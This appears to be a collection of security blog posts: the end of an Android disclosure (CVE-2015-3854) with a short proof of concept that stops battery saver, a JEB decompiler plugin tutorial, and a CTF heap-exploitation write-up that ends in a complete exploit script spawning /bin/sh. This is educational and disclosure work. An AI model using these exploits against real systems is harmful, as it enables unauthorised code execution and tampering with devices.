        if (action.equals(ACTION_SHOW_BATTERY_SETTINGS)) {
            dismissLowBatteryNotification();
            mContext.startActivityAsUser(mOpenBatterySettings, UserHandle.CURRENT);
        } else if (action.equals(ACTION_START_SAVER)) {
            dismissLowBatteryNotification();
            showStartSaverConfirmation();
        } else if (action.equals(ACTION_STOP_SAVER)) {
            dismissSaverNotification();
            dismissLowBatteryNotification();
            setSaverMode(false); // PERMISSION LEAK HERE!
        } else if (action.equals(ACTION_DISMISSED_WARNING)) {
            dismissLowBatteryWarning();
        }
    }
}
```

An ordinary app cannot call this method directly because the API call is guarded by the system permission DEVICE_POWER. However, by sending a broadcast with the action "PNW.stopSaver", it can trigger this API call on behalf of SystemUI, and thus stop battery saver without user action or awareness.

Tested on Nexus 6/Nexus 7 (5.1.1)

POC code (does not require any permission)

    Intent intent = new Intent();
    intent.setAction("PNW.stopSaver");
    sendBroadcast(intent);

Possible mitigations

Use a local broadcast mechanism, or use a permission to guard the dynamic receiver.

Official fixes:

fixed in https://android.googlesource.com/platform/frameworks/base/+/05e0705177d2078fa9f940ce6df723312cfab976

Report timeline

  • 2015.5.6 Initial report to security@android.com
  • 2015.5.8 Android Security Team acknowledges and assigns ANDROID-20918350
  • 2015.6.1 The bug is fixed in the Android internal branch
  • 2015.7.24 CVE requested, assigned CVE-2015-3854
  • 2016.5.26 Public disclosure

Advanced Android Application Analysis Series – JEB API Manual and Plugin Writing

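Advanced Android Application Analysis Tutorial, Part 1: A First Look at the JEB API

Still scratching your head over smali and jdgui, grepping back and forth? This tutorial series focuses on Soot and JEB and covers advanced analysis of Android applications. Feel the thrill of trading a fowling piece for a cannon.

JEB is the de facto standard for static analysis of Android applications. Besides accurate decompilation results and high fault tolerance, the API JEB provides also makes it easy to write plugins that process source files, perform deobfuscation, or even carry out more advanced application analysis to ease subsequent manual analysis. The first few articles in this series introduce the use of JEB's API and show in practice how to deobfuscate using the traces developers leave behind. First, let's look at the effect of the automated deobfuscation plugin we will end up writing:

Before deobfuscation: before-deobfus-1 before-deobfus-2 After deobfuscation: after-deobfus-1

after-deobfus-2 As you can see, many class names and field names have been recovered. Readers will surely wonder how this is done, so let's first look at the structure of the API JEB provides:

Structure of the JEB AST API

JEB's AST differs slightly from Java's AST but is largely similar, only somewhat simplified. All AST elements implement jeb.api.ast.IElement and inherit from either jeb.api.ast.NonStatement or jeb.api.ast.Statement. Their relationship is shown in the figure below: ast-1

IElement defines getSubElements, but the implementation and the returned results differ by type. For example, calling getSubElements on a Method returns the function's parameter definition statements and the function body block, while an IfStm returns the Predicates used for the conditions and each if/else/ifelse block. An Assignment statement returns the left and right IExpression operands and the Operator. When actually writing scripts we usually do not use this function but the finer-grained functions defined by the specific type, such as getLeft and getRight provided by Assignment.

Taking the following function as an example, let's analyze which AST elements it consists of.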

boolean isZtz162(Ztz ztz)
{
    boolean bool = true;
    Redrain redrain = Redrain.getInstance("AnAn");
    if(redrain.canShoot())
    {
        redrain.shoot(163);
        if(ztz.isDead()) { bool = false; }
    }
    else if(ztz.height + Integer.parseInt(ztz.shoe) > 162)
    { bool = false; }
    return bool;
}

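Let's first look at NonStatement.

NonStatement

In the documentation, NonStatement is described as "Base class for AST elements that do not represent Statements.", that is, all AST structures that are not Statements inherit from NonStatement, as shown below: ast-2

The difference between NonStatement and Expression is that NonStatement includes some higher-level structures, such as jeb.api.ast.Class and jeb.api.ast.Method, AST structures that do not appear within statements. They represent a Class structure and a Method structure respectively; be careful not to confuse them with the Class and Method used in reflection statements.

Statement

As its name suggests, a Statement represents a statement, but note that a statement here is not necessarily a single statement: a Statement that inherits from Compound may contain other Statements. Take the following code: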

if(ztz.isDead()) //redundant statement to demonstrate if-else
{ return false; }
else{ return true; }

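This is in fact a single IfStm, which inherits from Compound and is therefore a Statement.

The inheritance diagram of Statement is shown below: ast-3

A Statement that is not a Compound is the most basic statement structure; its child nodes consist only of Expressions and never contain a block. For example, for an Assignment you can obtain the operands on the left and right through getLeft and getRight, which are an ILeftExpression and an IExpression respectively. ILeftExpression represents an Expression that can serve as an lvalue, such as a variable; a constant obviously does not implement the ILeftExpression interface.

Compound

Compound represents a collection of syntax blocks made up of multiple statements. Each syntax block is presented as a Block (also a subclass of Compound) and is obtained via getBlocks. All branch statements inherit from Compound, as shown below: ast-4

In the example above, the IfStm is a Compound. We obtain the Predicate via getBranchPredicate(idx), i.e. the Expression ztz.isDead(), whose actual type is the subclass Call. We can obtain the Blocks of the if and if-else branches via getBranchBody(idx), and the else Block via getDefaultBlock.

IExpression

IExpression represents the most basic AST node; its implementation relationships are shown below: ast-5

The Expression class, an implementer of the IExpression interface, represents statement fragments of arithmetic and logical operations, such as a+b, "162" + ztz.toString(), !ztz, redrain*(ztz-162) and so on. The Predicate class is a direct subclass of Expression; for instance, in if(ztz162), the left operand of the statement's Predicate is the identifier ztz162 and the right operand is null.

Taking the Expression ztz.test(1) + "height" + 162 as an example, its structure and the type of each node are as follows: jeb-expression-chart A few points are worth noting:

  • Expression is a right-to-left structure.
  • Call provides no API for obtaining the caller, but it can be obtained through getSubElements(), which returns, in order:
    • callee method
    • calling instance (if instance call)
    • calling arguments, one by one

InstanceField, StaticField and Field

The relationship between the three is shown below: 1434640610408

InstanceField and StaticField contain a Field. InstanceField provides getInstance, which returns an IExpression, the container of the Field. Field itself is an element of a Class, while InstanceField and StaticField are its concrete instantiations.

Analysis of an example Method

Taking the isZtz162 function mentioned above as an example, its AST structure is as follows: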

  • jeb.api.ast.Method (getName() == "isZtz162") => getBody()
    • Block => block.get(i) // iterate over the statements in the block
      • Assignment "boolean bool = true" => getSubElements
        • Definition "boolean bool"
          • Identifier "bool"
        • Constant "true"
      • Assignment "Redrain redrain = Redrain.getInstance("AnAn");" => getSubElements
        • Definition => getSubElements (note: this is what the parent assignment's getLeft returns, the lvalue)
          • Identifier "redrain"
        • Call "Redrain.getInstance("AnAn")" (note: this is what the parent assignment's getRight returns, the rvalue)
          • …(omit)
      • IfStm (Compound) => getBlocks()
        • Block (if block) => block.get(i) // iterate over the statements in the block
          • Call "redrain.shoot(163);"
          • IfStm (Compound)
            • …omit
        • Block (elseif block) => block.get(i) // iterate over the statements in the block
          • Assignment "bool = false"
          • ..omit

The following code recursively prints each Element in a Method:

from jeb.api import IScript
from jeb.api.ui import View

class test(IScript):

    def run(self, j):
        self.instance = j
        # Signature of the method under the cursor in the Java view
        sig = self.instance.getUI().getView(View.Type.JAVA).getCodePosition().getSignature()
        currentMethod = self.instance.getDecompiledMethodTree(sig)
        self.instance.print("scanning method: " + currentMethod.getSignature())

        body = currentMethod.getBody()
        self.instance.print(repr(body))
        for i in range(body.size()):
            self.viewElement(body.get(i),1)

    def viewElement(self, element, depth):
        # Print this element indented by its depth, then recurse into its children
        self.instance.print("    "*depth+repr(element))
        for sub in element.getSubElements():
            self.viewElement(sub, depth+1)

The output is as follows:

jeb.api.ast.Block@5909b311
    jeb.api.ast.Assignment@bcb4ec2
    jeb.api.ast.Definition@66afd874
        jeb.api.ast.Identifier@38ffa6bd
    jeb.api.ast.Constant@181bdf87
    jeb.api.ast.Assignment@4df0246e
    jeb.api.ast.Definition@50e7d9bb
        jeb.api.ast.Identifier@2587ad7c
    jeb.api.ast.Call@6e8ebb23
        jeb.api.ast.Method@5ca02f89
            jeb.api.ast.Definition@1890fae1
                jeb.api.ast.Identifier@5646d660
            jeb.api.ast.Block@44a464e0
        jeb.api.ast.Constant@4dad155
    jeb.api.ast.IfStm@298ea172
    jeb.api.ast.Predicate@530958ae
        jeb.api.ast.Call@a9d3219
            jeb.api.ast.Method@56440cc0
                jeb.api.ast.Definition@da13d7f
                    jeb.api.ast.Identifier@54cc63d6
                jeb.api.ast.Block@36aea218
            jeb.api.ast.Identifier@2587ad7c
    jeb.api.ast.Predicate@313f1b4
        jeb.api.ast.Expression@12616200
            jeb.api.ast.InstanceField@3768f76d
                jeb.api.ast.Identifier@4c4c3186
                jeb.api.ast.Field@198ed96b
            jeb.api.ast.Call@71640ce8
                jeb.api.ast.Method@5f8b8d80
                jeb.api.ast.InstanceField@42f6ff81
                    jeb.api.ast.Identifier@4c4c3186
                    jeb.api.ast.Field@6600907f
        jeb.api.ast.Constant@2f0eb62a
    jeb.api.ast.Block@6ed99788
        jeb.api.ast.Call@f6b9a93
            jeb.api.ast.Method@617130cd
                jeb.api.ast.Definition@4e3b14b5
                    jeb.api.ast.Identifier@8cc9f33
                jeb.api.ast.Definition@31e7d1c8
                    jeb.api.ast.Identifier@6a7dbb10
                jeb.api.ast.Block@64844e0e
            jeb.api.ast.Identifier@2587ad7c
            jeb.api.ast.Constant@2a20acb0
        jeb.api.ast.IfStm@47296c6b
            jeb.api.ast.Predicate@708d094c
                jeb.api.ast.Call@3b5d964e
                    jeb.api.ast.Method@7d36f954
                        jeb.api.ast.Definition@242b3a05
                            jeb.api.ast.Identifier@11ee30d0
                        jeb.api.ast.Block@2cc6b0e2
                    jeb.api.ast.Identifier@4c4c3186
            jeb.api.ast.Block@2886dc65
                jeb.api.ast.Assignment@2def7fac
                    jeb.api.ast.Identifier@38ffa6bd
                    jeb.api.ast.Constant@46a70cc3
    jeb.api.ast.Block@136fa72
        jeb.api.ast.Assignment@407452fd
            jeb.api.ast.Identifier@38ffa6bd
            jeb.api.ast.Constant@46a70cc3
    jeb.api.ast.Return@14f4811a
    jeb.api.ast.Identifier@38ffa6bd
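The same recursion can be tried outside JEB with stand-in objects. In this sketch `FakeElement` and `collect` are hypothetical helpers that are not part of the JEB API; only the `getSubElements` method name is taken from the text, and the tree is a hand-built approximation of a small if-block, not real decompiler output.

```python
class FakeElement:
    """Hypothetical stand-in for a jeb.api.ast element; not part of the JEB API."""

    def __init__(self, kind, *children):
        self.kind = kind
        self.children = list(children)

    def getSubElements(self):
        return self.children


def collect(element, kind, found=None):
    """Depth-first search for every element whose kind matches `kind`."""
    if found is None:
        found = []
    if element.kind == kind:
        found.append(element)
    for sub in element.getSubElements():
        collect(sub, kind, found)
    return found


# Stand-in tree: an if-block containing "bool = false", then a return statement.
tree = FakeElement(
    "Block",
    FakeElement(
        "IfStm",
        FakeElement("Predicate", FakeElement("Call")),
        FakeElement(
            "Block",
            FakeElement("Assignment",
                        FakeElement("Identifier"),
                        FakeElement("Constant")),
        ),
    ),
    FakeElement("Return", FakeElement("Identifier")),
)

identifiers = collect(tree, "Identifier")
calls = collect(tree, "Call")
```

A filter like this is a natural first step toward a plugin that, for example, looks only at Call or Assignment nodes instead of printing everything.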

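That concludes the analysis of the AST structure; this article picked several of the most typical types to explain. In addition, JEB provides jeb.api.dex, an API for operating on dex files. Since there is plenty of material on that, it is not covered here.

Example analysis: setting up the development environment

JEB natively supports development in two languages, Java and Python; the latter is supported through Jython. For simplicity, our examples all use Python. Personally, if you want to use the former, I suggest using Scala instead, as Java itself is far too verbose.

Java

In eclipse, configure the library in the classpath to point to bin/jeb.jar, and point the javadoc path to jeb/doc/apidoc.zip.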

1434639993696

1434639954618

1434639823928

1434639770823

Python

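Setting up the Python environment is a bit more troublesome, because JEB does not provide a corresponding skeleton, so Python IDEs have no code completion by default and need to be configured manually. I use the JythonHelper plugin for PyCharm, which helps generate a skeleton and gives basic code completion.

With the environment configured, let's write the simplest possible plugin: print the method signature at the cursor position. The code is as follows: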

from jeb.api import IScript
from jeb.api.ui import View
class test(IScript):

    def run(self, j):
        self.instance = j
        sig = self.instance.getUI().getView(View.Type.JAVA).getCodePosition().getSignature()
        currentMethod = self.instance.getDecompiledMethodTree(sig)
        self.instance.print("scanning method: " + currentMethod.getSignature())

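Save it as test.py and click File->Run Script->test.py; JEB will print the signature of the function at the current cursor position in the console below.

Summary

This article introduced the basics of the JEB Java AST API and the first steps of plugin writing, and can also serve as a supplementary reference to the API doc. In the next article we will use examples to explain how to write more advanced and complex plugins. Source code and test samples can be found at https://github.com/flankerhqd/jebPlugins.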

freenote – advanced heap exploitation

Author: Flanker

Abstract

Freenote is a binary with infoleak and double-free vulnerabilities and is good practice for heap exploitation. The first vulnerability is that when a note is deleted its content isn’t zeroed, so when another note is allocated at the very same location, the content of the previous allocation is still there. The second vulnerability is that when freeing a note the program does not check whether the note has already been freed, causing a double free.

Introduction

There are two data structures used in freenote; we name one “NoteBook” and the other “Note”. They can be mapped to the following structures:

struct Note {
    int in_use;
    int content_length;
    char* content;
};

struct Notebook {
    int tot_cnt;
    int use_cnt;
    struct Note notes[256];
};

There are four operations available: list, delete, new and edit. The delete operation simply sets the in_use field to zero and calls free on the Note ptr; however, it does not check whether the note has already been freed (i.e. the in_use field is already zero). The edit operation checks whether the new input length equals the original one; if not, it calls realloc and then writes the new content into the original note. The new operation mallocs a (len//0x80 + 1)*0x80 chunk and writes the user input; notice that no zeroing allocation or memset to zero is performed. This leads to the first vulnerability, the infoleak.

Heap base address InfoLeak

As stated before, neither the new note nor the delete note operation zeroes out memory. Recall the chunk struct of glibc malloc:
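As a quick worked example of the size formula quoted above, the request size for a few input lengths can be computed directly. The function name `note_request_size` is hypothetical; the formula is the one given in the text.

```python
def note_request_size(length):
    """Size passed to malloc for a note of `length` bytes, per the formula in the text."""
    return (length // 0x80 + 1) * 0x80


sizes = {length: note_request_size(length) for length in (1, 0x7F, 0x80, 0x100)}
```

Every request is therefore a multiple of 0x80, which keeps the notes out of the fastbin size range on 64-bit glibc and is what makes the fd/bk-based leak described next possible.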

struct malloc_chunk { 
    INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */ 
    INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */ 
    struct malloc_chunk* fd; /* double links -- used only if free. */ 
    struct malloc_chunk* bk; /* double links -- used only if free. */ 
    struct malloc_chunk* fd_nextsize; /* Only used for large blocks: pointer to next larger size. */
    struct malloc_chunk* bk_nextsize; /* Only used for large blocks: pointer to next larger size. */
 };

Also, list note uses the %s format string to output note content. So we can free two non-adjacent notes. This makes the first 16 bytes (for 64-bit arch, or 8 bytes for 32-bit arch) after the size field, which originally held the “data”/”content” of the in-use note, hold the fd and bk pointers of the free list. Then we can new a note again; because a freed chunk in the bin list tends to be reused first, we actually get the originally freed note back. We write sizeof(malloc_chunk*) chars into the note, which overwrite fd only, then call list note, and the %s output runs on into the bk pointer value.

We cannot just free one note and call new note on it, because when there is only one free chunk, this chunk’s fd and bk point to a glibc global struct (main_arena) rather than to a chunk on the heap. We need a heap address to bypass ASLR in order to exploit the double-free vulnerability next.

So the steps are:
- New four notes: 0, 1, 2, 3
- Delete 0 and 2
- New a note again; this time note 0’s chunk is reused. Write 4 bytes (32-bit arch) / 8 bytes (64-bit arch)
- List notes to get note 2’s address, then subtract the offset to get the heap base address.
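The last step can be sketched as a small helper. This is a minimal sketch for the 64-bit case: the function name is made up for illustration, and the two constants are taken from the gdb session in this article (0x90-byte chunks, note 0's chunk at 0x604820 with the heap starting at 0x603000), so they are assumptions that only hold for that layout.

```python
import struct

CHUNK_SIZE = 0x90                         # chunk size of a small note (from the dumps)
NOTE0_CHUNK_OFFSET = 0x604820 - 0x603000  # note 0's chunk relative to the heap base


def heap_base_from_leak(leaked):
    """Turn the bytes printed after our 8 filler chars into the heap base.

    `leaked` is the raw bk pointer as printed by %s, so trailing zero
    bytes are missing and have to be padded back.
    """
    raw = leaked[:8].ljust(8, b"\x00")
    note2_chunk = struct.unpack("<Q", raw)[0]
    # note 2's chunk sits two chunks after note 0's chunk
    return note2_chunk - 2 * CHUNK_SIZE - NOTE0_CHUNK_OFFSET


if __name__ == "__main__":
    print(hex(heap_base_from_leak(b"\x40\x49\x60")))
```

With the bk value 0x604940 from the dump, the helper yields 0x603000.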

After 0 is freed:

gdb-peda$ x/100xg 0x604820
0x604820:    0x0000000000000000    0x0000000000000091
0x604830:    0x00007ffff7dd37b8    0x00007ffff7dd37b8

gdb-peda$ p main_arena
$3 = {
  mutex = 0x0,
  flags = 0x1,
  fastbinsY = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0},
  top = 0x604a60,
  last_remainder = 0x0,
  bins = {0x604820, 0x604820, 0x7ffff7dd37c8, 0x7ffff7dd37c8, 0x7ffff7dd37d8, 0x7ffff7dd37d8,

Notice that at this point chunk Note0 does not contain any pointer to an address on the heap.

After 2 is freed:

(after free 2)
0x604820:    0x0000000000000000    0x0000000000000091(note 0 chunk)
0x604830:    0x00007ffff7dd37b8    0x0000000000604940(point to note2 free chunk)
0x604840:    0x0000000000000000    0x0000000000000000
0x604850:    0x0000000000000000    0x0000000000000000
0x604860:    0x0000000000000000    0x0000000000000000
0x604870:    0x0000000000000000    0x0000000000000000
0x604880:    0x0000000000000000    0x0000000000000000
0x604890:    0x0000000000000000    0x0000000000000000
0x6048a0:    0x0000000000000000    0x0000000000000000
0x6048b0:    0x0000000000000090    0x0000000000000090(note 1 chunk)
0x6048c0:    0x0000000062626262    0x0000000000000000
0x6048d0:    0x0000000000000000    0x0000000000000000
0x6048e0:    0x0000000000000000    0x0000000000000000
0x6048f0:    0x0000000000000000    0x0000000000000000
0x604900:    0x0000000000000000    0x0000000000000000
0x604910:    0x0000000000000000    0x0000000000000000
0x604920:    0x0000000000000000    0x0000000000000000
0x604930:    0x0000000000000000    0x0000000000000000
0x604940:    0x0000000000000000    0x0000000000000091(note 2 chunk)
0x604950:    0x0000000000604820    0x00007ffff7dd37b8(point back to note0 free chunk)
0x604960:    0x0000000000000000    0x0000000000000000

gdb-peda$ p main_arena
$4 = {
mutex = 0x0,
flags = 0x1,
fastbinsY = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0},
top = 0x604a60,
last_remainder = 0x0,
bins = {0x604940, 0x604820, 0x7ffff7dd37c8, 0x7ffff7dd37c8, 0x7ffff7dd37d8, 0x7ffff7dd37d8,

Double free

As a note can be freed twice, we can use the unlink primitive to do an arbitrary write. But how do we bypass the glibc unlink check, FD->BK == P && BK->FD == P? We will assume 64-bit arch for the rest of this article.

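Remember there is also a pointer to the note chunk in the notes array; we call it “content”. A fake chunk with *(FD+3) == P == content and *(BK+2) == P == content (offsets counted in 8-byte words) will pass glibc’s check. The unlink then writes FD into the content slot, so the slot ends up pointing 3 words before itself, thus *P = P-3.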

Free uses prev_size to locate the previous chunk if the PREV_INUSE bit (size&1) is clear. If dlmalloc finds that the previous chunk is free when freeing the current chunk, it does an unlink on the previous chunk to take it off the freelist and merges it with the current chunk.
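To make the effect of the check and the two unlink writes concrete, here is a toy model in which memory is a Python dict mapping addresses to 8-byte words. It is a simplified sketch of the classic unlink logic, not glibc's actual code, and the two addresses in demo() are illustrative values chosen to resemble the dumps in this article.

```python
WORD = 8  # 64-bit words


def unlink(mem, p):
    """Toy unlink of chunk `p`: fd lives at p+0x10, bk at p+0x18."""
    fd = mem[p + 2 * WORD]
    bk = mem[p + 3 * WORD]
    # the check: FD->bk == P and BK->fd == P
    if mem.get(fd + 3 * WORD) != p or mem.get(bk + 2 * WORD) != p:
        raise ValueError("corrupted double-linked list")
    mem[fd + 3 * WORD] = bk  # FD->bk = BK
    mem[bk + 2 * WORD] = fd  # BK->fd = FD (this write lands last)


def demo():
    slot = 0x603030  # assumed address of the content pointer in the notes array
    fake = 0x604830  # assumed address of the fake chunk (note 0's data)
    mem = {
        slot: fake,                      # content pointer -> fake chunk
        fake + 2 * WORD: slot - 3 * WORD,  # fake fd, so FD + 3 words == slot
        fake + 3 * WORD: slot - 2 * WORD,  # fake bk, so BK + 2 words == slot
    }
    unlink(mem, fake)
    return slot, mem[slot]


if __name__ == "__main__":
    slot, value = demo()
    print(hex(slot), "->", hex(value))
```

Both writes hit the same slot; the second one wins, which is why the content pointer ends up three words below its own address.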

So we have a skeleton idea:
- Alloc 0, 1, 2; place the fake chunk at 0
- Free 1, 2
- Alloc 3 covering 1, 2, so that we can construct a fake chunk at the original location of 2
- Call free on 2 again

What’s worth noticing is that dlmalloc decides whether a block is in use by checking the PREV_INUSE flag of the next adjacent chunk. So to make the double free on 2 succeed, we need to append two more fake chunks and mark them as in use. This is because:

For the following chunks (assume all valid chunks): | 1 | 2 | 3 | 4 | 5 |

When freeing 3, dlmalloc checks whether 2 is in use using 3’s PREV_INUSE flag, and checks whether 4 is in use using 5’s PREV_INUSE flag. 5’s address is computed as 3’s address + 3’s size + 4’s size. So when we make fake chunk 3, we must also append two “valid” fake in-use chunks after it to avoid a SIGSEGV.
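The offsets involved can be worked out with a few lines of arithmetic. This is a sketch under assumptions: all values are offsets from the heap base, the 0x1820 offset of the first note chunk comes from the infoleak dumps, and the victim index 3 follows the example exploit at the end of this article rather than the 0/1/2 numbering of the skeleton above. The helper names are made up for illustration.

```python
CHUNK_SIZE = 0x90     # size of one small note chunk
HEADER = 0x10         # prev_size + size on 64-bit
NOTE0_CHUNK = 0x1820  # offset of note 0's chunk from the heap base (from the dumps)


def chunk_offset(index):
    """Offset of the chunk header that originally belonged to note `index`."""
    return NOTE0_CHUNK + index * CHUNK_SIZE


def fake_layout(victim_index=3):
    fake_chunk = chunk_offset(0) + HEADER  # fake chunk lives in note 0's data
    victim = chunk_offset(victim_index)    # chunk that gets freed a second time
    return {
        "fake_chunk": fake_chunk,
        "victim": victim,
        # prev_size must lead free() from the victim back to the fake chunk
        "prev_size": victim - fake_chunk,
        # the two appended fake chunks whose PREV_INUSE bits are set
        "next": victim + CHUNK_SIZE,
        "next_next": victim + 2 * CHUNK_SIZE,
    }


if __name__ == "__main__":
    for name, value in sorted(fake_layout().items()):
        print("%-10s %#x" % (name, value))
```

The prev_size this produces, 0x1a0, equals the 144*2 + 128 used as prev_size_offset in the example code.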

READ LIBC ADDRESS

Once the write succeeds, the memory layout of the NoteBook struct, which sits at the beginning of the heap, becomes

gdb-peda$ x/40xg 0x11af000
0x11af000:    0x0000000000000000    0x0000000000001821
0x11af010:    0x0000000000000100    0x0000000000000002
0x11af020:    0x0000000000000001    0x0000000000000020
0x11af030:    0x00000000011af018    0x0000000000000001

Notice *P has become P-3, so by editing the note we can overwrite P, pointing it to free@got or wherever is convenient. When constructing the note payload, notice that the payload length should be equal to the original one (0x20), or realloc will be called and our fake chunk will not pass realloc’s checks. For the convenience of the following note edit, in which we write an 8-byte address to note 0, we also set note 0’s length to 8 here.
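The 0x20-byte edit payload can be sketched with the struct module. Since the content pointer now points at P-3, the four words written cover use_cnt, then note 0's in_use, content_length and content fields. The function name and default values are illustrative; the free@got address 0x602018 is the one used in the example exploit at the end of this article and is specific to that binary.

```python
import struct

FREE_GOT = 0x602018  # free@got as used in the example exploit (binary-specific)


def edit_payload(target, use_cnt=2, in_use=1, length=8):
    """Four little-endian 8-byte words written starting at P-3."""
    return struct.pack("<QQQQ", use_cnt, in_use, length, target)


if __name__ == "__main__":
    payload = edit_payload(FREE_GOT)
    # must stay 0x20 bytes so the edit does not trigger realloc
    print(len(payload), repr(payload))
```

Setting length to 8 in the same write is what lets the later 8-byte edit of note 0 go through without realloc.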

Then perform a note list to read free@got’s content, i.e. free’s address. Using this address we are able to compute system’s address. Then a write (note edit) is performed on note 0; remember we have already set note 0’s length to 8, thus avoiding realloc.
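The address computation is plain offset arithmetic, sketched below. The two offsets are the ones the example exploit uses for the libc on the target server; they are assumptions for any other libc build and would have to be looked up again. The function name is made up for illustration.

```python
FREE_OFFSET = 0x76C60    # offset of free in the target libc (from the example exploit)
SYSTEM_OFFSET = 0x40190  # offset of system in the same libc


def system_from_free(free_addr):
    """Derive system's runtime address from the leaked address of free."""
    libc_base = free_addr - FREE_OFFSET
    return libc_base + SYSTEM_OFFSET


if __name__ == "__main__":
    leaked_free = 0x7ffff7a00000 + FREE_OFFSET  # made-up leak for demonstration
    print(hex(system_from_free(leaked_free)))
```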

EXECUTE CODE

We choose to overwrite free@got because we can control its argument, e.g. by freeing a note whose content is under our control, like “/bin/sh”. So we new a note with content “/bin/sh\x00”; calling the rewritten free (now system) on it then gives us a shell.

Example code (64bit and 32bit)

64bit:

from zio import *
import time
#io = zio('./freenote1')
io = zio(("xxxx",10001))

def new_note(content):
    io.read_until("choice: ")
    io.writeline("2")

    io.read_until("new note: ")
    io.writeline(str(len(content)))
    io.read_until("note: ")
    io.writeline(content)
    io.read_until("choice: ")

def free_note(nid):
    io.read_until("choice: ")
    io.writeline("4")
    io.read_until("number: ")
    io.writeline(str(nid))

def read_note(nid):
    io.read_until("Your choice: ")
    io.writeline("1")
    notes = io.read_until("== 0ops Free Note ==")
    #if the listing reports "Invalid", read the next listing instead
    if notes.find("Invalid") != -1:
        io.read_until("Your choice: ")
        notes = io.read_until("== 0ops Free Note ==")
    #each listed note looks like "<id>. <content>"
    prefix = "%d. " % nid
    for note in notes.split('\n'):
        if note.startswith(prefix):
            return note[len(prefix):]
    return ""

def mod_note(nid, content):
    io.read_until("Your choice: ")
    io.writeline("3")
    io.read_until("Note number: ")
    io.writeline(str(nid))
    io.read_until("Length of note: ")
    io.writeline(str(len(content)))
    io.read_until("Enter your note: ")
    io.writeline(content)
    io.read_until("choice: ")


new_note("aaaa")
new_note("bbbb")
new_note("cccc")
new_note("dddd")

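#free block 0 and 2
free_note(0)
free_note(2)
#reuse note 0's chunk: the 8 bytes overwrite fd, bk (pointing to note 2's chunk) follows
new_note("abcdabcd")
out = read_note(0)
#leaked bk minus two chunks minus the offset of note 0's chunk gives the heap base
base_addr = l64(out[8:].ljust(8,"\x00")) - 144*2 - (0x604820 - 0x603000)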

prev_size_offset = 144*2 + 128
#note addr begins at 0x603010 
FAKE_PREV_SIZE = 0x0
FAKE_SIZE = prev_size_offset + 1
FAKE_FD_ADDR = base_addr + 0x18 #*(FD+3) = P, FD + 0x18 is note 0's content pointer
FAKE_BK_ADDR = base_addr + 0x20 #*(BK+2) = P, BK + 0x10 is note 0's content pointer

#free the remaining notes 0,1,3 (2 is already free)
free_note(0)
free_note(1)
free_note(3)

new_note(l64(FAKE_PREV_SIZE) + l64(FAKE_SIZE) + l64(FAKE_FD_ADDR) + l64(FAKE_BK_ADDR))
new_note("/bin/sh\x00")

FAKE_PREV_SIZE = prev_size_offset
FAKE_SIZE = 0x90


#alloc one big note covering old chunks (2,3): it rewrites chunk 3's header so that
#prev_size points back to the fake chunk in note 0's data area with PREV_INUSE clear,
#and appends two fake in-use chunks after it
new_note('a'*128 + l64(FAKE_PREV_SIZE) + l64(FAKE_SIZE) + 128*'a' + (l64(0) + l64(0x91) + 128*'a')*2)
#double free: note 3's stale pointer is freed again, which unlinks the fake chunk
free_note(3)

'''
|PREV_SIZE|SIZE|{PREV_SIZE}|{SIZE}|{DATA}|PREV_SIZE|SIZE|DATA
'''

'''
now *p = p-3, modify note 0's content pointer to free@got
'''
mod_note(0, l64(0x2) + l64(0x1) + l64(0x8) + l64(0x602018))

free_addr = l64(read_note(0).ljust(8, "\x00"))
system_addr = free_addr - (0x76C60 - 0x40190)#libc at pwn server
#system_addr = free_addr - (0x82df0 - 0x46640)
mod_note(0, l64(system_addr))
free_note(1)
io.interact()